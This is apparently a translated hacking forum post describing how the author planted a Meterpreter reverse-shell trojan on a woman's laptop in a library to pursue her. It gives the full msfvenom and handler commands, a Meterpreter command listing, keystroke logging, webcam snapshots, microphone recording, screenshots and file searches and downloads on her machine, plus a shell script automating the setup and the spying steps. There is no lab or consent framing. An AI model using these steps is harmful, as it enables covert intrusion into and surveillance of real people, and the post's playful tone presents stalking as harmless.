
The Library Flirting Chronicle, Part 2

Yeshisan, 4 weeks ago (652 views)

"The Library Flirting Chronicle" is a write-up I did at the start of 2017. The guys in the group were quite interested in this old piece. The techniques in it are really just a combination of fairly basic tricks, nothing complex or advanced. For legal reasons I cut some of the details, but since some of you asked about what happened afterwards, I'll add a bit more here.

Meterpreter overview

Meterpreter is an extension (payload) of the Metasploit framework and an indispensable post-exploitation tool. After a Metasploit payload has been delivered to the target and executed there, it connects back and sets up a channel that gives interactive, shell-like control of the target machine; that channel is the Meterpreter session. Meterpreter lives in memory inside the process it was injected into and talks to the Metasploit console over its own TLV protocol, so it does not need to spawn a visible cmd.exe to work.
As a post-exploitation module the Meterpreter shell has many useful functions: adding a user, hiding things, opening a shell, obtaining user passwords (hashes), uploading and downloading files on the remote host, running cmd.exe, capturing the screen, taking remote control, logging keystrokes, clearing the event log, displaying the remote host's system information, displaying its network interfaces and IP addresses, and so on. (Copied from Baidu.)

Using Meterpreter

Before anything else, generate an exe trojan with msfvenom (not msfconsole):

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=4444 -f exe > ./yeshisan.exe
  • msfvenom replaces the older msfpayload and msfencode
  • -p selects the payload; here it is the reverse_tcp (connect-back) module
  • LHOST: the address the trojan connects back to, i.e. our own machine, as seen from the target
  • LPORT: the port it connects back to; the default is 4444
  • -f: the output format, exe here for a Windows executable. msfvenom writes to stdout, so the shell redirect is what puts the file in the current directory (/root in this case); -o ./yeshisan.exe does the same without the redirect

When the generated trojan runs on the target, it opens a TCP connection to the preset IP address and port. On our side we listen on that port for the reverse connection; when the connection comes in, a Meterpreter session is established automatically.

So we also need to listen on port 4444 on our own machine. Start Metasploit with msfconsole.

root@plabs:~# msfconsole

Load the handler (listener) module:

msf > use exploit/multi/handler

Set the payload; it must be the same one used to generate the trojan:

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

Show the options that need to be set:

msf exploit(handler) > show options


What needs setting here is LHOST and LPORT, the address and port to listen on. Since the trojan was generated with the default port, only LHOST has to be set; then run to start listening. Note that the handler's LHOST must be an address this machine actually has (0.0.0.0 listens on every interface), while the LHOST baked into the trojan must be an address the target can reach; behind NAT those two are not the same.

msf exploit(handler) > set LHOST 192.168.0.3
LHOST => 192.168.0.3
msf exploit(handler) > run

Once the trojan is run on the target, msf sees the incoming connection and opens a session.

If you are not very familiar with Meterpreter, the help command lists what is available:

meterpreter > help

Core Commands
=============

Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel

Stdapi: File system Commands
============================

Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory

Stdapi: Networking Commands
===========================

Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
route View and modify the routing table

Stdapi: System Commands
=======================

Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components

Stdapi: Webcam Commands
=======================

Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam

Priv: Elevate Commands
======================

Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.

Priv: Password database Commands
================================

Command Description
------- -----------
hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

Command Description
------- -----------
timestomp Manipulate file MACE attributes

Commonly used Meterpreter commands

help: show the help text
background: put the session in the background and return to the msf prompt
download: download a file from the target
upload: upload a file to the target
execute: run a program on the compromised host
shell: drop into the target's native command shell (cmd.exe on Windows, /bin/sh on Linux)
sessions -i <id>: from the msf prompt, switch back into a backgrounded session (the command is sessions, plural)

Some additions to the earlier article

Since this is a follow-up to the earlier article, I won't list everything; below are a few of the commands used later on in the library story.

Keylogging: keyscan_start

We can turn on keystroke logging through Meterpreter to see what she is typing; open Notepad and type something as a test. One thing to know: keyscan only captures keystrokes for the desktop of the process Meterpreter is running in, so if the session is not already in a process on the user's interactive desktop, migrate into one (explorer.exe is the usual choice) before starting the sniffer.

meterpreter > keyscan_start
Starting the keystroke sniffer...

Then pull the captured keystrokes down and read them; you can see I typed meizi i love you (the <Back> marks a backspace).
Dump the keystroke log: keyscan_dump

meterpreter > keyscan_dump
Dumping captured keystrokes...
meizi l <Back> i love you

Stop keylogging: keyscan_stop

Give her a surprise: take a photo with the laptop's webcam.

List the webcams: webcam_list
Take a snapshot from a webcam: webcam_snap
Record from the microphone: record_mic

I won't say much about the audio recording; if the target is a phone, you get the idea.
Combine it with the webcam and you have a live stream; of course I've basically never used that, I'm purely joking.

To see what she is doing right now, type screenshot at the prompt; the captured image is saved in the local working directory (here /root; check it with lpwd).

meterpreter > screenshot
Screenshot saved to: /root/ThWrdjpy.jpeg
meterpreter >


Of course, don't forget that my original goal was the files on her computer, to see whether there was any contact information in them. To search for files on the target use the search command; search -h shows the usage.

search -h
Usage: search [-d dir] [-r recurse] -f pattern
Search for files.

OPTIONS:

-d <opt> The directory/drive to begin searching from. Leave empty to search all drives. (Default: )
-f <opt> The file pattern glob to search for. (e.g. *secret*.doc?)
-h Help Banner.
-r <opt> Recursivly search sub directories. (Default: true)

A simple example: to find every txt file, pass the pattern *.txt to -f. With no -d the search walks every drive, which is slow; give -d a drive or directory to narrow it down.

Judge by the file name whether it is what you are after; once you spot an interesting file, pull it with download. The command takes the remote path and, optionally, a local destination; -r only matters when the target is a directory that should be fetched recursively (it is harmless on a single file, as below). The file is written to the local working directory (lpwd).
meterpreter > download -r c:/1.txt
[*] downloading: c:/1.txt -> 1.txt
[*] downloaded : c:/1.txt -> 1.txt
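Pulling the whole procedure together (the msfvenom and multi/handler setup from the top of the post, and the keyscan, screenshot and search steps just above), here is an added example of my own, not code from the original post: a small POSIX shell script that keeps LHOST/LPORT in one place, writes an msfconsole resource file for the listener and a Meterpreter resource file for the post-session steps, and prints the matching msfvenom command. The IP, port and payload name are the ones used in the post; the file names, the C:/Users search root and the use of migrate -N explorer.exe (which needs a reasonably recent Metasploit; on older versions find the pid with ps and use migrate <pid>) are my assumptions.

```shell
#!/bin/sh
# Added example, not from the original post. Keeps payload, listener and
# post-session steps in one place so LHOST/LPORT can never drift apart.
# Assumptions: the file names, the search root and migrate -N are mine;
# only the IP, port and payload name come from the post.
set -eu

PAYLOAD="windows/meterpreter/reverse_tcp"
LHOST="192.168.0.3"     # address the target can reach (the attacker box)
LPORT="4444"
EXE="./yeshisan.exe"

# The msfvenom command that matches the handler below.
# -o writes the file directly instead of relying on a shell redirect.
venom_cmd() {
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -f exe -o %s' \
        "$PAYLOAD" "$LHOST" "$LPORT" "$EXE"
}

# msfconsole resource file (run with: msfconsole -q -r handler.rc).
# ExitOnSession false keeps the listener up after the first session comes in;
# exploit -j runs it as a background job so the console stays usable.
write_handler_rc() {
    cat > "$1" <<EOF
use exploit/multi/handler
set PAYLOAD $PAYLOAD
set LHOST $LHOST
set LPORT $LPORT
set ExitOnSession false
exploit -j
EOF
}

# Meterpreter resource file (inside a session: resource loot.rc).
# keyscan_start only sees keystrokes for the desktop of the process Meterpreter
# lives in, so first migrate into explorer.exe, which sits on the user's
# interactive desktop. keyscan_dump is left out on purpose: run it by hand
# once the user has had time to type something.
write_loot_rc() {
    cat > "$1" <<EOF
migrate -N explorer.exe
keyscan_start
screenshot
search -d C:/Users -f *.txt
EOF
}

write_handler_rc handler.rc
write_loot_rc loot.rc
echo "1. generate the payload:  $(venom_cmd)"
echo "2. start the listener:    msfconsole -q -r handler.rc"
echo "3. inside the session:    resource loot.rc"
```

Run the script once, then follow the three printed steps in order: generate the exe, start msfconsole with handler.rc, and after the session arrives run resource loot.rc from the meterpreter prompt. Because both resource files are generated from the same variables, changing the listening address or port is a one-line edit rather than something to remember in two places.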

Lastly, I wanted to give her a surprise: the same old routine as in the earlier article, hijack and bring up Apache to serve the page.

root@plabs:~# service apache2 start
[ ok ] Starting web server: apache2.
root@plabs:~#


Finally

You think that's the end????

Would that fit my usual style???

There is obviously more to the story, about getting into her school and using the school's xx to confess.

But

I can't be bothered to write it. The end.
